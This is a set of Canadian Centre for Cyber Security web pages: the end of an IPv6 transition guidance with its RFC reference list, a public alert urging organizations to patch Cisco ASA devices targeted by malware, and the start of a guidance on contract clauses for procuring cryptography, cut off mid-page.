class="wb-inv">Footnote </span>22</a></sup> Network Address Translation for <abbr title="Internet Protocol version 6">IPv6</abbr>-only clients to reach <abbr title="Internet Protocol version 4">IPv4</abbr> servers) alongside DNS64 (a mechanism for synthesizing <abbr title="Domain Name System">DNS</abbr> AAAA records from A records)<sup id="fn23-rf"><a class="fn-lnk" href="#fn23"><span class="wb-inv">Footnote </span>23</a></sup> or 464XLAT (combination of stateful^T and stateless<sup id="fn24-rf"><a class="fn-lnk" href="#fn24"><span class="wb-inv">Footnote </span>24</a></sup> translation for <abbr title="Internet Protocol version 4">IPv4</abbr> connectivity across <abbr title="Internet Protocol version 6">IPv6</abbr>-only networks.)<sup id="fn25-rf"><a class="fn-lnk" href="#fn25"><span class="wb-inv">Footnote </span>25</a></sup></p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.17">2.17 Zero trust architecture</h3> <p>Zero trust architecture (ZTA) is built on the foundational security principle of eliminating implicit trusts within the enterprise network. Zero trust assumes no inherent trust for resources and thus requires each resource (application, device, user, and network interface) to be uniquely identified, authenticated, and authorized.</p> <p>The <abbr title="Internet Protocol version 6">IPv6</abbr> standard provides foundational capabilities for the implementation of zero trust. These capabilities include an expanded address space, multiple addresses per interface, and IPsec header extensions for source authentication, data integrity and data confidentiality.</p> <p>A multiple addressing strategy can be used to identify devices, interfaces or applications on the network, providing foundational support for micro-segmentation. This makes micro-segmentation easier, allowing traffic flows to be managed through fine-grain network access control lists.</p> <p>Additionally, organizations can leverage <abbr title="Internet Protocol version 6">IPv6</abbr> extension headers by enabling IPsec to achieve secure end-to-end <abbr title="Internet Protocol">IP</abbr> communications. Enabling IPsec provides interface authentication and end-to-end confidentiality and integrity protections for data and control messages on the network.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.18">2.18 Technical and operational depth</h3> <p>The lack of technical understanding and operational expertise in <abbr title="Internet Protocol version 6">IPv6</abbr> represents a significant challenge for many organizations. Few network engineers possess detailed knowledge of the <abbr title="Internet Protocol version 6">IPv6</abbr> specification standards. To build the technical competencies required for the future, organizations should invest in training networking and security professionals on <abbr title="Internet Protocol version 6">IPv6</abbr> and its capabilities. Organizations should also develop expertise by exploring <abbr title="Internet Protocol version 6">IPv6</abbr> capabilities within dedicated network labs and/or limited pilot deployments. Organizations are encouraged to strengthen technical competencies and capabilities required to ensure network performance, address network design and operational issues, and architect security requirements.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="text-info mrgn-tp-xl" id="3">3 Conclusion</h2> <p>The challenges associated with limited <abbr title="Internet Protocol version 4">IPv4</abbr> addresses are likely to increase. <abbr title="Internet Protocol version 6">IPv6</abbr> is designed to address these issues and offer additional security benefits. Modern networking stacks prioritize <abbr title="Internet Protocol version 6">IPv6</abbr>, conforming with the <abbr title="Internet Engineering Task Force">IETF</abbr> specification standard, and organizational network enterprise strategies must be updated to manage associated risks. Traditional security controls that were built around <abbr title="Internet Protocol version 4">IPv4</abbr> addressing, such as monitoring capabilities for example, will require updates and re-alignment. The Cyber Centre strongly recommends that GC organizations undertake proactive and informed actions to securely design and scope their <abbr title="Internet Protocol version 4">IPv4</abbr> to <abbr title="Internet Protocol version 6">IPv6</abbr> transition plans in line with Cyber Centre recommendations.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><!–***************************************** END PUBLICATION ***********************************************–><!–***************************************** REFERENCES ***************************************************–><!–FOOTNOTE SECTION EN–><aside class="wb-fnote" role="note"><h3 class="mrgn-tp-xl" id="reference">Reference</h3> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p><a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-ipv6-in-windows">Guidance for configuring IPv6 in Windows for advanced users</a></p> <p class="fn-rtn"><a href="#fn1-rf"><span class="wb-inv">Return to footnote</span>1<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 2</dt> <dd id="fn2"> <p><a href="https://datatracker.ietf.org/doc/html/rfc8504">IPv6 Node Requirements</a></p> <p class="fn-rtn"><a href="#fn2-rf"><span class="wb-inv">Return to footnote</span>2<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 3</dt> <dd id="fn3"> <p><a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a></p> <p class="fn-rtn"><a href="#fn3-rf"><span class="wb-inv">Return to footnote</span>3<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 4</dt> <dd id="fn4"> <p><a href="https://www.rfc-editor.org/rfc/rfc9099.html">RFC 9099: Operational Security Considerations for IPv6 Networks</a></p> <p class="fn-rtn"><a href="#fn4-rf"><span class="wb-inv">Return to footnote</span>4<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 5</dt> <dd id="fn5"> <p><a href="https://datatracker.ietf.org/doc/html/rfc6762">Multicast DNS</a></p> <p class="fn-rtn"><a href="#fn5-rf"><span class="wb-inv">Return to footnote</span>5<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 6</dt> <dd id="fn6"> <p><a href="https://www.rfc-editor.org/rfc/rfc4795.html">Link-Local Multicast Name Resolution (LLMNR)</a></p> <p class="fn-rtn"><a href="#fn6-rf"><span class="wb-inv">Return to footnote</span>6<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 7</dt> <dd id="fn7"> <p><a href="https://www.nist.gov/programs-projects/usgv6-program/usgv6-revision-1">United States Government (USGv6-r1) Profile</a></p> <p class="fn-rtn"><a href="#fn7-rf"><span class="wb-inv">Return to footnote</span>7<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 8</dt> <dd id="fn8"> <p><a href="https://datatracker.ietf.org/doc/html/rfc8305">Happy Eyeballs Version 2: Better Connectivity Using Concurrency</a></p> <p class="fn-rtn"><a href="#fn8-rf"><span class="wb-inv">Return to footnote</span>8<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 9</dt> <dd id="fn9"> <p><a href="https://datatracker.ietf.org/doc/html/rfc6343">RFC 6343 Advisory Guidelines for 6to4 Deployment</a></p> <p class="fn-rtn"><a href="#fn9-rf"><span class="wb-inv">Return to footnote</span>9<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 10</dt> <dd id="fn10"> <p><a href="https://en.wikipedia.org/wiki/ISATAP">Wikipedia: RFC 5214 Intra-site Automatic Tunnel Addressing Protocol (ISATAP)</a></p> <p class="fn-rtn"><a href="#fn10-rf"><span class="wb-inv">Return to footnote</span>10<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 11</dt> <dd id="fn11"> <p><a href="https://www.rfc-editor.org/rfc/rfc9099.html">RFC 9099: Operational Security Considerations for IPv6 Networks</a></p> <p class="fn-rtn"><a href="#fn11-rf"><span class="wb-inv">Return to footnote</span>11<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 12</dt> <dd id="fn12"> <p><a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-ipv6-in-windows">Guidance for configuring IPv6 in Windows for advanced users</a></p> <p class="fn-rtn"><a href="#fn12-rf"><span class="wb-inv">Return to footnote</span>12<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 13</dt> <dd id="fn13"> <p><a href="https://datatracker.ietf.org/doc/html/rfc7934.txt">RFC 7934 Host Address Availability Recommendations</a></p> <p class="fn-rtn"><a href="#fn3-rf"><span class="wb-inv">Return to footnote</span>13<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 14</dt> <dd id="fn14"> <p><a href="https://www.rfc-editor.org/rfc/rfc8415">RFC 8415: Dynamic Host Configuration Protocol for IPv6 (DHCPv6)</a></p> <p class="fn-rtn"><a href="#fn14-rf"><span class="wb-inv">Return to footnote</span>14<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 15</dt> <dd id="fn15"> <p><a href="https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr_dhcp/configuration/15-sy/dhcp-15-sy-book/ip6-dhcpv6-guard.pdf">Cisco: DHCP – DHCPv6 Guard</a></p> <p class="fn-rtn"><a href="#fn15-rf"><span class="wb-inv">Return to footnote</span>15<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 16</dt> <dd id="fn16"> <p><a href="https://www.rfc-editor.org/rfc/rfc8156">RFC 8156: DHCPv6 Failover Protocol</a></p> <p class="fn-rtn"><a href="#fn16-rf"><span class="wb-inv">Return to footnote</span>16<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 17</dt> <dd id="fn17"> <p><a href="https://datatracker.ietf.org/doc/rfc9686/">Registering Self-Generated IPv6 Addresses Using DHCPv6</a></p> <p class="fn-rtn"><a href="#fn17-rf"><span class="wb-inv">Return to footnote</span>17<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 18</dt> <dd id="fn18"> <p><a href="https://datatracker.ietf.org/doc/html/rfc4861">RFC 4861 Neighbor Discovery for IP version 6 (IPv6)</a></p> <p class="fn-rtn"><a href="#fn18-rf"><span class="wb-inv">Return to footnote</span>18<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 19</dt> <dd id="fn19"> <p><a href="https://datatracker.ietf.org/doc/html/rfc3971">RFC 3971 SEcure Neighbor Discovery (SEND)</a></p> <p class="fn-rtn"><a href="#fn19-rf"><span class="wb-inv">Return to footnote</span>19<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 20</dt> <dd id="fn20"> <p><a href="https://datatracker.ietf.org/doc/html/rfc4890">RFC 4890 Recommendations for Filtering ICMPv6 Messages in Firewalls</a></p> <p class="fn-rtn"><a href="#fn20-rf"><span class="wb-inv">Return to footnote</span>20<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 21</dt> <dd id="fn21"> <p><a href="https://datatracker.ietf.org/doc/rfc4966/">RFC 4966 Reasons to Move the Network Address Translator – Protocol Translator (NAT-PT) to Historic Status</a></p> <p class="fn-rtn"><a href="#fn21-rf"><span class="wb-inv">Return to footnote</span>21<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 22</dt> <dd id="fn22"> <p><a href="https://datatracker.ietf.org/doc/html/rfc6146">RFC 6146 Stateful NAT64: Network Address and Protocol Translation from IPv6 Clients to IPv4 Servers</a></p> <p class="fn-rtn"><a href="#fn22-rf"><span class="wb-inv">Return to footnote</span>22<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 23</dt> <dd id="fn23"> <p><a href="https://datatracker.ietf.org/doc/html/rfc6147">DNS64: DNS Extensions for Network Address Translation from IPv6 Clients to IPv4 Servers</a></p> <p class="fn-rtn"><a href="#fn23-rf"><span class="wb-inv">Return to footnote</span>23<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 24</dt> <dd id="fn24"> <p><a href="https://datatracker.ietf.org/doc/html/rfc7915">RFC 7915 Stateless IP/ICMP Translation Algorithm</a></p> <p class="fn-rtn"><a href="#fn24-rf"><span class="wb-inv">Return to footnote</span>24<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 25</dt> <dd id="fn25"> <p><a href="https://datatracker.ietf.org/doc/html/rfc6877">464XLAT: Combination of Stateful and Stateless Translation</a></p> <p class="fn-rtn"><a href="#fn25-rf"><span class="wb-inv">Return to footnote</span>25<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside></div> </div> </div> </div> </div> </article>

This joint guidance has been developed with contributions from partnering agencies and is part of a series of publications aiming to draw attention to the importance of cyber security in operational technology.

<article data-history-node-id="6835" about="/en/news-events/statement-canadian-centre-cyber-security-malware-targeting-global-organizations-through-cisco-systems" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><p>The Canadian Centre for Cyber Security (Cyber Centre), a part of the Communications Security Establishment Canada (CSE), is urging Canadian organizations to take immediate action to protect themselves in response to a serious new cyber security threat identified today by Cisco: <a href="https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks">Cisco Event Response: Continued Attacks Against Cisco Firewalls</a>. This threat affects end-of-life Cisco <abbr title="Adaptive Security Appliance">ASA</abbr> devices.</p> <p>Timing is crucial when vulnerabilities like these are identified. We strongly recommend network defenders bolster their defences based on our latest alert and advisory, and apply appropriate patches immediately.</p> <ul><li>Read the Cyber Centre’s alert on this threat: <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="0594ba8c-7337-46bf-b42f-e2761f463f06" href="/en/alerts-advisories/al25-012-vulnerabilities-impacting-cisco-asa-ftd-devices-cve-2025-20333-cve-2025-20362-cve-2025-20363">AL25-012 – Vulnerabilities impacting Cisco ASA and FTD devices – CVE-2025-20333, CVE-2025-20362 and CVE-2025-20363</a></li> <li>Read the Cyber Center’s advisory on this threat: <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="cd17a5c1-7289-4cfd-b5eb-d434993b77d2" href="/en/alerts-advisories/cisco-security-advisory-av25-619">Cisco security advisory (AV25-619)</a></li> </ul><p>This threat activity uses advanced techniques to avoid detection, making it difficult to identify through conventional means. If you believe your organization may be affected, please call us <a href="tel:+18332923788">1-833-CYBER-88</a> or email <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a> as soon as possible.</p> <h2>Quotes</h2> <blockquote> <p>"This is a critical moment for Canadian organizations. Threat actors are targeting legacy systems with increasing sophistication. I urge all critical infrastructure sectors to act swiftly. The Cyber Centre stands ready to assist. Early action is the best defence to protect your systems and safeguard your information."</p> <p>- Rajiv Gupta, Head of the Canadian Centre for Cyber Security</p> </blockquote> <h2>Background</h2> <p>The Cyber Centre is aware of cyber threat activity against Cisco <abbr title="Adaptive Security Appliance">ASA</abbr> 5500-X Series devices involving the deployment of highly sophisticated malware, targeting global organizations. These types of devices are commonly used by organizations across Canada.</p> <p>Expert teams at the Cyber Centre are actively investigating the vulnerability’s scope and have initiated outreach to support stakeholders and coordinate a unified response.</p> <p>Together, through vigilance and collective action, we can continue to strengthen Canada’s cyber resilience from coast to coast to coast.</p> <p>For more information on vulnerabilities, please visit the Cyber Centre’s <a href="/en/alerts-advisories">Alerts and advisories page</a>.</p> <p>For best practices, please visit the Cyber Centre’s <a href="/en/guidance">Guidance page</a>.</p> </div> </div> </div> </div> </div> </article>

<article data-history-node-id="6705" about="/en/guidance/recommended-contract-clauses-cryptography-itsm00501" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>September 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Management series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSM.00.501</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>September 2025 | Management series</strong></p> </div> <div class="col-md-12 mrgn-tp-lg"> <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/itsm.00.501-recommended-contract-clauses-cryptography.pdf">Recommended Contract Clauses for Cryptography – ITSM.00.501 (PDF, 462 KB)</a></p> </div> <h2 class="text-info mrgn-tp-0">Foreword</h2> <p>This is an <span class="text-uppercase">unclassfied</span>, publication, issued under the authority of the Head of the Canadian Centre for Cyber Security (Cyber Centre). For more information, contact the Cyber Centre:</p> <p><span class="glyphicon glyphicon-envelope"></span><span class="wb-inv">email</span> <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a> |<span class="glyphicon glyphicon-phone"></span><span class="wb-inv">Mobile</span> <a href="tel:613-949-7048">613-949-7048</a> or <a href="tel:+1-833-292-3788">1<span>‑</span>833<span>‑</span>CYBER<span>‑</span>88</a></p> <h2 class="text-info">Effective date</h2> <p>This publication takes effect on September 2025.</p> <h2 class="text-info">Revision history</h2> <ol><li>First release: September 1, 2025</li> </ol></div> </div> <section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#overview">Overview</a></li> <li><a href="#introduction">1 Introduction</a> <ul><li><a href="#scope">1.1 Scope</a></li> </ul></li> <li><a href="#cryptographic-considerations">2 Cryptographic considerations</a> <ul><li><a href="#product">2.1 Product considerations</a> <ul><li><a href="#recommended">2.1.1 Recommended cryptographic algorithms</a></li> <li><a href="#cryptographic-agility">2.1.2 Cryptographic agility</a></li> <li><a href="#certification">2.1.3 Cryptographic certification</a></li> </ul></li> </ul><ul><li><a href="#considerations">2.2 Considerations for service providers and cloud services</a> <ul><li><a href="#post-quantum">2.2.1 Post-quantum cryptography</a></li> <li><a href="#configuration">2.2.2 Configuration</a></li> <li><a href="#validated">2.2.3 Using validated cryptographic modules and algorithms</a></li> </ul></li> </ul></li> <li><a href="#terms">3 Terms and conditions</a></li> <li><a href="#conclusion">4 Conclusion</a></li> </ul></details></section><section><h2 class="text-info" id="overview">Overview</h2> <p>As your organization increases the use of cryptography to protect your infrastructure and data, there is a growing need to ensure that your organization purchases products and services that provide effective protection. Whether procuring a single-use product or contracting with a service provider such as a cloud service provider (CSP), your organization must consider certain elements to ensure that the product or service will meet your needs. This publication provides advice and guidance on what to consider when procuring products and services that use cryptography, including example clauses.</p> </section><section><h2 class="text-info" id="introduction">1 Introduction</h2> <p>The guidance in this publication highlights important security considerations for your organization when purchasing products and services that use cryptography. This includes but is not limited to service providers and cloud service providers (CSPs).</p> <p>While vendors may present initial foundational terms and conditions, your organization’s management team is responsible for demonstrating and validating that the terms and conditions and the contract’s supporting security clauses address your organization’s business security needs.</p> <p>The terms and conditions should be adaptable for future modifications to safeguard the interests of your organization. The terms and conditions in the service contract should also provide your organization with the best possible business outcomes. Your organization must initiate proactive measures to ensure service provisions include cyber security mechanisms for identifying, communicating, mitigating and preventing risks.</p> <p>This publication outlines cryptographic considerations that should be factored in alongside the primary functional and legal contracting aspects when working with a vendor.</p> <p>The clauses outlined in this publication should not be considered legal advice. Rather, they offer context for your organization and can help your organization determine considerations and questions to ask when procuring cryptographic products and services.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div> <h2 class="text-info" id="scope">1.1 Scope</h2> <p>The Cyber Centre provides advice and guidance on selecting and using cryptographic algorithms to protect the authenticity, confidentiality and integrity of sensitive information. This publication provides advice and guidance on what to consider when engaging with a vendor to purchase products or services that use cryptography for the protection of <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span> and <span class="text-uppercase">protected B</span> information.</p> <p><strong>Disclaimer:</strong> The Communications Security Establishment Canada (CSE) and its Cyber Centre do not recommend or endorse the use of any particular contracting clause listed in this publication. The example clauses provided are only intended to be a source of examples of contract clauses that may be useful for procuring products and service that use cryptography and are provided for informational purposes only. We recommend seeking legal and procurement advice when using these clauses to ensure that they meet your organization’s requirements.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </div> </section><section><h2 class="text-info" id="cryptographic-considerations">2 Cryptographic considerations</h2> <p>To protect the confidentiality, integrity and authenticity of your organization’s data, you must ensure that all infrastructure effectively uses strong cryptography for both on-premises environments and service provider environments. This includes cloud environments.</p> <p>The following sections present items that should be considered when engaging with vendors. The considerations discuss cryptographic algorithms, modules and parameters to support organizations in following Cyber Centre guidance.</p> <p><a href="#product">Section 2.1 Product considerations</a> outlines considerations to be taken when purchasing products and focuses on the requirements of the products being purchased. <a href="#considerations">Section 2.2 Considerations for service providers and cloud services</a> provides advice and guidance for engaging with service and cloud providers and focuses on how the vendor selects, configures and uses cryptography.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div> <h3 id="product">2.1 Product considerations</h3> <p>This section provides product considerations and example contract clauses to use when purchasing products that support cryptography. The clauses have been developed for products that have built-in cryptographic modules, such as virtual private networks (VPN) and other network appliances that support cryptography natively. These considerations can also be used to develop requirements for generic computing devices that will have software installed after purchase (for example, servers).</p> <p><strong>Note:</strong> The Cyber Centre publication <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="8ca102c3-b06e-4fe3-89b1-65f2a6866bd3" href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111)</a> is updated regularly as advice and guidance changes. Any clauses that are used to procure products and that reference ITSP.40.111 should specify the publication version.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <!– Sub-sub section start –> <div> <h4 id="recommended">2.1.1 Recommended cryptographic algorithms</h4> <p>Contractual clauses should ensure that cryptographic modules use algorithms recommended in ITSP.40.111 that meet your system requirements. Additionally, to avoid extra costs during the migration to post-quantum cryptography (PQC), we recommend that all newly procured cryptographic modules support appropriate PQC algorithms.</p> <p>The following clauses recognize that some vendors do not currently support PQC and that some standards that will use the algorithms may still be under development. By specifying a date by which the vendor must provide PQC capabilities, your organization can purchase from the vendor when needed without waiting for the vendor to have PQC capable products. The vendor will be required to provide upgrades to the cryptographic modules on or before the date specified.</p> <p><strong>Example clause structure and language</strong></p> <ul><li>Cryptographic modules must use only CSE-approved cryptographic algorithms with cryptographic parameter sizes and key lengths as specified in <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="8ca102c3-b06e-4fe3-89b1-65f2a6866bd3" href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111)</a>.</li> <li>By the end of 2026, cryptographic modules implementing key establishment schemes must support appropriate post-quantum cryptography compliant with Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111).</li> <li>By the end of 2026, cryptographic modules implementing digital signature schemes must support appropriate post-quantum cryptography compliant with Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111).</li> </ul><div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </div> <div> <h4 id="cryptographic-agility">2.1.2 Cryptographic agility</h4> <p>Using systems that support cryptographic agility enables organizations to reconfigure or upgrade cryptographic technologies as needed. This is important because progress in cryptographic research, vulnerability research and computing can lead to cryptographic deployments with less strength than when they were initially deployed. Products should have the capability to modify parameters, such as key lengths, parameter sizes and key lifetimes, and to select cryptographic algorithms without replacing software or hardware components. This will reduce both the expense and time needed for purchasing new infrastructure. Products must also have the critical ability to securely patch systems that use cryptography to ensure that vulnerabilities are mitigated as they are discovered.</p> <p>For more information on cryptographic agility, read our publication <a href="https://www.cyber.gc.ca/en/guidance/guidance-becoming-cryptographically-agile-itsap40018">Guidance on becoming cryptographically agile (ITSAP.40.018)</a>.</p> <p><strong>Example clause structure and language</strong></p> <ul><li>Cryptographic modules must support cryptographic agility by providing cryptographic algorithms, parameter sizes, key lengths and crypto periods that are configurable.</li> <li>Cryptographic modules must support vendor-signed patches and updates.</li> </ul><div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </div> <div> <h4 id="certification">2.1.3 Cryptographic certification</h4> <p>We recommend that all cryptographic modules be validated through the <a href="https://www.cyber.gc.ca/en/tools-services/cryptographic-module-validation-program-cmvp">Cryptographic Module Validation Program (CMVP)</a>. The CMVP is jointly managed by the Cyber Centre and the National Institute of Standards and Technology (NIST). It ensures that vendors implement cryptography correctly in their products and that they follow Cyber Centre–recommended security best practices. To find validated modules, organizations can search the database of CMVP-validated modules, which is hosted by NIST. Cryptographic algorithms used in the modules should be validated by the <a href="https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program">Cryptographic Algorithm Validation Program (CAVP)</a>.</p> <p>CMVP certification is specific to the details provided in the security policy available on the product certificate webpage. It is important that products use the cryptographic module according to that security policy. This ensures with a high degree of certainty that the module will provide the expected security services in the expected manner.</p> <p><strong>Example clause structure and language</strong></p> <ul><li>Cryptographic algorithms must be validated by the Cryptographic Algorithm Validation Program (CAVP) with a certificate listed on the <a href="https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program/validation-search">CAVP validation list</a>.</li> <li>Cryptographic modules must be validated by the Cryptographic Module Validation Program (CMVP) with an active CMVP certification and a certificate number listed on the <a href="https://csrc.nist.gov/Projects/Cryptographic-Module-Validation-Program/Validated-Modules">CMVP-validated modules list</a>.</li> <li>Cryptographic modules must be applied in accordance with the cryptographic module security policy listed on the CMVP-validated modules list, in either an approved or an allowed mode.</li> </ul><div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </div> </div> <div> <h3 id="considerations">2.2 Considerations for service providers and cloud services</h3> <p>Organizations that outsource IT infrastructure or software solution management to cloud vendors or service providers must consider the cryptography used to protect the information. This section provides additional cryptographic considerations when contracting a service or cloud provider.</p> <p>Your organization should ensure that contracting requirements obligate the contractor to maintain IT systems that are aligned with current cryptographic guidance. In addition to this publication, the Cyber Centre publication <a href="https://www.cyber.gc.ca/en/guidance/recommended-cyber-security-contract-clauses-cloud-services-itsm50104">Recommended cyber security contract clauses for cloud services (ITSM.50.104)</a> provides general procurement clauses and considerations when acquiring cloud-based solutions or services.</p> <p><strong>Note:</strong> We recommend that contracts with service providers ensure contractors remain current with the latest versions of ITSP.40.111 and our <a href="https://www.cyber.gc.ca/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a>. As such, clauses that reference either ITSP.40.111 or ITSP.40.062 should not reference a specific version or publication date and should require contractors to remain aligned with current Cyber Centre recommendations.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div> <h4 id="post-quantum">2.2.1 Post-quantum cryptography</h4> <p>We recommend that all cryptographic modules support CSE-approved PQC algorithms as soon as they are available. The following clauses allow organizations to procure from service providers as needed, with the understanding that the cryptographic modules must be migrated to support PQC no later than the date specified. This approach provides flexibility to both the purchaser and the vendor while ensuring that the PQC migration is not delayed or more costly than necessary.</p> <p><strong>Example clause structure and language</strong></p> <ul><li>By the end of 2026, cryptographic modules implementing key establishment schemes must support appropriate post-quantum cryptography compliant with <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="8ca102c3-b06e-4fe3-89b1-65f2a6866bd3" href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111</a><a href="https://www.cyber.gc.ca/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">)</a>.</li> <li>By the end of 2026, cryptographic modules implementing digital signature schemes must support appropriate post-quantum cryptography compliant with Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111).</li> </ul><div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </div> <div> <h4 id="configuration">2.2.2 Configuration</h4> <p>Cryptography should be configured to operate according to the advice and guidance provided in the Cyber Centre’s publications ITSP.40.111 and ITSP.40.062. Following the most recent versions of these publications will help to keep your environment secure as cryptographic guidance evolves. Additionally, we recommend that cryptography is configured and operated in an approved or allowed mode found in the CMVP security policy.</p> <p><strong>Example clause structure and language</strong></p> <p>The Contractor must:</p> <ul><li>configure systems to only permit use of cryptography in accordance with CSE-approved cryptographic algorithms and cryptographic parameter sizes, key lengths and key lifetimes, as specified in <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="8ca102c3-b06e-4fe3-89b1-65f2a6866bd3" 